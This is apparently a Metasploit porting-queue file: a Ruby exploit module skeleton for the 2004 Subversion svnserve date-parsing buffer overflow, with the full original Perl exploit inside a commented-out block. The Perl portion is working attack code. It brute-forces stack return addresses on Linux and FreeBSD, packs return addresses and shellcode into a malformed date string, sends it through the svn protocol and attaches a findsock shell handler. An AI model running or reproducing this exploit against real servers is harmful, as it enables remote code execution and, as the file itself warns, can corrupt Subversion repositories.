metasploit-framework/dev/porting/queue/svnserve_date.rb

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6.5 KiB
Ruby

require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Subversion Date Svnserve',
'Description' => %q{
This is an exploit for the Subversion date parsing overflow.
This exploit is for the svnserve daemon (svn:// protocol)
and will not work for Subversion over webdav (http[s]://).
This exploit should never crash the daemon, and should be
safe to do multi-hits.
**WARNING** This exploit seems to (not very often, I've only
seen it during testing) corrupt the subversion database, so
be careful!
},
'Author' => [ 'spoonm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '6301'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
[ 'MIL', '68'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
'MinNops' => 16,
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'linux, bsd',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'May 19 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::svnserve_date;
use strict;
use base 'Msf::Exploit';
use Pex::Text;
my $advanced =
{
'StackTop' => ['', 'Start address for stack ret bruteforcing, empty for defaults from target'],
'StackBottom' => ['', 'End address for stack ret bruteforcing, empty for defaults from target'],
'StackStep' => [0, 'Step size for ret bruteforcing, 0 for auto calculation.'],
'BruteWait' => [.4, 'Length in seconds to wait between bruteforce attempts'],
# This was like 62 on my machine and 88 on HD's
'RetLength' => [100, 'Length of rets after payload'],
'IgnoreErrors' => [0, 'Keep going even after critical errors.'],
};
my $info = {
'Name' => 'Subversion Date Svnserve',
'Version' => '$Revision$',
'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux', 'bsd' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The svnserve port', 3690],
'URL' => [1, 'DATA', 'SVN URL (ie svn://host/repos)', 'svn://host/svn/repos'],
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
'MinNops' => 16, # This keeps brute forcing sane
'Keys' => ['+findsock'],
},
'Nop' =>
{
'SaveRegs' => ['esp'],
},
'Description' => Pex::Text::Freeform(qq{
This is an exploit for the Subversion date parsing overflow. This
exploit is for the svnserve daemon (svn:// protocol) and will not work
for Subversion over webdav (http[s]://). This exploit should never
crash the daemon, and should be safe to do multi-hits.
**WARNING** This exploit seems to (not very often, I've only seen
it during testing) corrupt the subversion database, so be careful!
}),
'Refs' =>
[
['OSVDB', '6301'],
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
['MIL', '68'],
],
'DefaultTarget' => -1,
'Targets' =>
[
['Linux Bruteforce', '0xbffffe13', '0xbfff0000'],
['FreeBSD Bruteforce', '0xbfbffe13', '0xbfbf0000'],
],
'Keys' => ['subversion'],
'DisclosureDate' => 'May 19 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $retLength = $self->GetLocal('RetLength');
my $bruteWait = $self->GetLocal('BruteWait');
my $stackTop = $self->GetLocal('StackTop');
my $stackBottom = $self->GetLocal('StackBottom');
my $stackStep = $self->GetLocal('StackStep');
my $url = $self->GetVar('URL');
my $srcPort = $self->GetVar('CPORT');
$stackTop = $target->[1] if(!length($stackTop));
$stackBottom = $target->[2] if(!length($stackBottom));
$stackTop = hex($stackTop);
$stackBottom = hex($stackBottom);
$stackStep = $encodedPayload->NopsLength if($stackStep == 0);
$stackStep -= $stackStep % 4; # ya ya, whatever
for(my $ret = $stackTop; $ret >= $stackBottom; $ret = $self->StepAddress('Address' => $ret, 'StepSize' => $stackStep)) {
my $sock = Msf::Socket::Tcp->new('PeerAddr' => $targetHost, 'PeerPort' => $targetPort, 'LocalPort' => $srcPort);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
$self->PrintLine(sprintf("Trying %#08x", $ret));
my $evil = (pack('V', $ret) x int($retLength / 4)) . $shellcode;
# my $evil = 'A' x 300;
my @data = (
'( 2 ( edit-pipeline ) ' . lengther($url) . ' ) ',
'( ANONYMOUS ( 0: ) ) ',
'( get-dated-rev ( ' .
# lengther('Tue' . 'A' x $ARGV[0] . ' 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off -18000)') . ' ) ) '.
lengther($evil . ' 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)') . ' ) ) ',
'',
);
my $i = 0;
foreach my $data (@data) {
my $dump = $sock->Recv(-1);
$self->PrintDebugLine(3, "dump\n$dump");
if(!$sock->Send($data) && $i < 3) {
$self->PrintLine('Error in send.');
$sock->PrintError;
$self->PrintLine('This is bad.');
$self->PrintLine("$dump\n");
return if(!$self->GetLocal('IgnoreErrors'));
}
if($i == 3 && length($dump)) {
$self->PrintLine("Received data when we should't have, bailing.");
$self->PrintLine($dump);
return if(!$self->GetLocal('IgnoreErrors'));
}
$i++;
}
select(undef, undef, undef, $bruteWait); # ghetto sleep
$self->Handler($sock);
$sock->Close;
select(undef, undef, undef, 1) if($srcPort); # ghetto sleep, wait for CPORT
}
return;
}
sub lengther {
my $data = shift;
return(length($data) . ':' . $data);
}
1;
=end
end
end